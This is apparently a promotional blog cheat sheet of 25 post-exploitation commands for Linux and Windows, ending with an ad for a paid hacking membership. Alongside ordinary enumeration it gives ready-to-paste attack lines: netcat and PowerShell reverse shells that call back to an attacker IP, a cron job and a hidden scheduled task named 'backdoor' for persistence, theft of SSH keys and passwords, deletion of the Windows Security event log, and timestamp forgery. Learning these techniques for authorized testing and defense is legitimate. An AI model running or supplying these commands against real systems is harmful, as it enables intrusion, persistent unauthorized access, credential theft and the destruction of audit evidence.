Ever wonder how real hackers pivot after that first successful exploit? It's not just about popping a shell. The real magic — the art and science — happens after you're in.

Most people think the game is over once you get a shell. The truth? It's just beginning. Post-exploitation is where pentesters, red teamers, and yes, even malicious actors, dig deep. They escalate privileges, move laterally, persist, collect data, and cover their tracks. Mastering these moves isn't just cool — it sets you apart in the cybersecurity world.

Ready to peek behind the curtain? Here's a practical, battle-tested toolkit with 25 commands every ethical hacker, bug bounty hunter, or blue teamer should know by heart. Let's get straight into it.

What Is Post-Exploitation (and Why Should You Care)?

In a nutshell, post-exploitation is everything you do on a system after you've gained access. Think of it like being inside a locked house: you're not just standing in the foyer; you're rummaging through rooms, finding valuables, maybe unlocking the back door for a friend. For pentesters and red teamers, post-exploitation is where you:

• Gather juicy info (credentials, configs, tokens)
• Escalate from a regular user to admin/root
• Maintain access for later (persistence)
• Move laterally within the network
• Evade detection and cover your tracks

It's the difference between a script kiddie and a real operator.

Now, let's break down 25 essential commands, with practical examples, so you can work smarter — not just harder.

1. Who Am I? Discovering Your Foothold

1. `whoami`

It's deceptively simple, but always your first step. You need to know your current context.

whoami

Expect output like www-data, user, or SYSTEM. This tells you what you can (and can't) do immediately.

2. `id`

Especially on Linux, id gives you UID, GID, group memberships.

id

If you see uid=0(root), you've already won. Otherwise, look for groups like sudo, wheel, or adm.

2. What System Am I In? System Enumeration

3. `uname -a`

You want OS version, architecture, and kernel info. Sometimes, it gives away potential privilege escalation vectors.

uname -a

For Windows, you'd use:

systeminfo

That's a goldmine for privilege escalation research — look up kernel exploits matching the version.

4. `hostname` and `hostnamectl`

You need to know where you are in the network.

hostname
hostnamectl

On Active Directory? The hostname might hint at naming conventions: DC01, WEB-SERVER, etc.

5. `cat /etc/os-release`

For precise Linux flavor and version:

cat /etc/os-release

This is surprisingly useful, especially with weird distros in CTFs or obscure embedded systems.

3. What Can I Touch? Directory and File Discovery

6. `ls -lha`

List directories with details. The a flag shows hidden files (dotfiles often hide passwords or SSH keys).

ls -lha ~/

I've found .bash_history and even .git folders with secrets by poking around here.

7. `find / -perm -4000 -type f 2>/dev/null`

Looking for SUID binaries? They're often privilege escalation gold mines.

find / -perm -4000 -type f 2>/dev/null

Look for weird binaries with the SUID bit set — sometimes, they allow privilege escalation.

8. `cat /etc/passwd`

Get the list of users — not for cracking passwords (that's old school), but for mapping attack surface.

cat /etc/passwd

On Windows, use:

net user

4. What's Running? Process and Service Enumeration

9. `ps aux` (or `tasklist` on Windows)

You want to know what's running. Is anything running as root? Any weird daemons?

ps aux

or

tasklist

You'll often find legacy apps, cron jobs, or even cleartext passwords in process arguments.

10. `netstat -tulnp` (or `Get-NetTCPConnection` on Windows)

Network services reveal remote access points and pivot opportunities.

netstat -tulnp

On PowerShell:

Get-NetTCPConnection

Look for services on high ports or "hidden" listeners.

5. Looting Credentials: Where's the Good Stuff?

11. `cat ~/.ssh/id_rsa` or `cat ~/.bash_history`

SSH private keys are often lying around. Same with command histories — sometimes containing passwords, curl tokens, or AWS keys.

cat ~/.ssh/id_rsa
cat ~/.bash_history

Be sure to check for AWS_ACCESS_KEY_ID and friends.

12. `grep -i password /etc/* 2>/dev/null`

You're hunting for anything that smells like credentials.

grep -i password /etc/* 2>/dev/null

On Windows, try looking for ini or config files:

findstr /si password c:\*.ini c:\*.config c:\*.xml

• Pro tip: Developers love to put secrets in config files. They hate managing secrets.

13. `cat /var/www/html/config.php`

Web applications often have database creds in config files. Change the path as needed.

cat /var/www/html/config.php

For pentesting, checking /var/www/ path for secrets is a classic move.

6. Privilege Escalation Recon

14. `sudo -l`

What commands can your current user run as root (without needing a password)? Sometimes, there are scripts or binaries you can abuse.

sudo -l

If you see something like sudo /usr/bin/vim, you're one :!sh away from root.

15. `getcap -r / 2>/dev/null`

Linux capabilities are like SUID, but subtler. Sometimes, a binary with weird capabilities can be exploited for escalation.

getcap -r / 2>/dev/null

If you see things like cap_setuid, dig deeper.

16. `wmic group get name, sid`

On Windows, mapping out group memberships is key. Maybe you're in a high-priv group without realizing it.

wmic group get name, sid

Combined with whoami /groups — you get the big picture.

7. Pivoting and Lateral Movement

17. `ssh user@targethost`

If you find SSH keys or passwords, lateral movement is your next play. Use them to hop to other systems.

ssh user@targethost

Or use psexec on Windows (classic for lateral movement):

psexec \\TARGET -u USER -p PASSWORD cmd

You haven't lived until you've chained together multiple pivots in a red team engagement.

18. `smbclient //target/share -U username`

SMB shares can hold all sorts of loot. On Windows-heavy networks, you'll use this a lot.

smbclient //target/share -U username

Try dir, get file.txt, and so on. It's underused, but super powerful.

8. Data Exfiltration & Persistence

19. `nc -lvnp 4444` (Netcat Reverse Shell)

Netcat is the hacker's Swiss Army knife. Set up a listener or send files.

On your attacking machine:

nc -lvnp 4444

On the victim:

nc <your_ip> 4444 -e /bin/bash

For Windows (with PowerShell), you might use:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<your_ip>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

Sometimes, reverse shells just work. Sometimes, AV ruins everything — but it's always worth trying.

20. `crontab -e` (Persistence)

Persistence means you can come back later. Cron jobs work wonders on Linux.

Edit cron jobs:

crontab -e

Add a line like:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'

On Windows, use schtasks:

schtasks /create /sc minute /mo 1 /tn backdoor /tr "powershell.exe -noni -nop -w hidden -c <command>"

The cool part? Even after a reboot, your access survives.

9. Covering Your Tracks

21. `history -c && history -w`

Clear the bash history. (It's not perfect, but better than nothing.)

history -c && history -w

On Windows, you might delete logs with:

del C:\Windows\System32\winevt\Logs\Security.evtx

Or, for PowerShell, clear command history:

Remove-Item (Get-PSReadlineOption).HistorySavePath

Let's be real — defenders still have tricks, but this buys you time.

22. `touch -mt YYYYMMDDhhmm file`

Reset file timestamps. When you add or modify files, defenders look for recent changes. Change them back with:

touch -mt 202201010101 somefile.txt

Combine this with ls -lt to check your work.

10. System and Network Recon

23. `ifconfig` / `ip a`

Find out which interfaces are up, and what local IPs you can pivot from.

ifconfig

or

ip a

Windows equivalent:

ipconfig

You might find a backup or management network — jackpot for lateral movement.

24. `route -n` / `netstat -rn`

Mapping network routes shows you where you can go. Sometimes, you discover other juicy subnets.

route -n

On Windows:

route print

I've seen hidden admin networks revealed with this command. Always worth a look.

25. `arp -a`

See who else is on the local network. This is especially useful in flat networks or when you're aiming for lateral movement.

arp -a

It spits out a list of IPs and MAC addresses you can scan or attack.

Bonus: A Quick Real-World Loop

Let me walk you through a classic post-exploitation workflow — using some of the above commands in sequence.

1. Figure out who you are:

whoami
id

Check the system:

uname -a
cat /etc/os-release

Hunt for keys and passwords:

ls -lha ~/
cat ~/.ssh/id_rsa
grep -i password /etc/*

Look for privilege escalation chances:

sudo -l
find / -perm -4000 -type f 2>/dev/null

Scan for lateral movement:

ifconfig
arp -a
smbclient //target/share -U username

Persist and clean up:

crontab -e
history -c && history -w

Each command fits together. In practice, what really happens is you'll bounce back and forth, picking up clues, trying one avenue, doubling back when AV blocks you.

Practical Tips for Every Hacker (from the Field)

• Stay curious: Dig deeper than the obvious. Sometimes, the real goods are two directories away.
• Automate, but verify: Scripts like LinPEAS and WinPEAS are amazing, but run the core commands yourself for learning and stealth.
• Always check config files: Especially web app configs — they leak DB credentials, AWS secrets, and API keys all the time.
• Don't skip process and network enumeration: A weird process or open port can be a pivot you'd never expect.
• Think like a sysadmin: Where would you hide a backup key? What would you name an emergency password file?

Okay, truth moment — even seasoned pentesters forget the basics under pressure. That's why having these commands burned into muscle memory is so powerful.

Wrapping Up: Why These Commands Matter

Mastering post-exploitation is about situational awareness. It's not just about the privilege escalation exploit or the reverse shell — it's knowing which command to run next.

Whether you're on a bug bounty hunt, deep in a red team engagement, or defending your own stack, these 25 commands are the toolkit you'll reach for every single time.

You might think, "It can't be this simple." But in practice? The pros hit these basics — fast, quiet, and methodical — and that's what makes them dangerous.

Keep practicing, keep exploring. The next time you land a shell, you'll know exactly what to do. And honestly? That's a pretty good feeling.

🚀 Become a VeryLazyTech Member — Get Instant Access

What you get today:

✅ 70GB Google Drive packed with cybersecurity content

✅ 3 full courses to level up fast

👉 Join the Membership → https://whop.com/verylazytech/

📚 Need Specific Resources?

✅ Instantly download the best hacking guides, OSCP prep kits, cheat sheets, and scripts used by real security pros.

👉 Visit the Shop → https://whop.com/verylazytech/

💬 Stay in the Loop

Want quick tips, free tools, and sneak peeks?

✖ Twitter | 👾 GitHub | 📺 YouTube | 📩 Telegram | 🕵️‍♂️ Website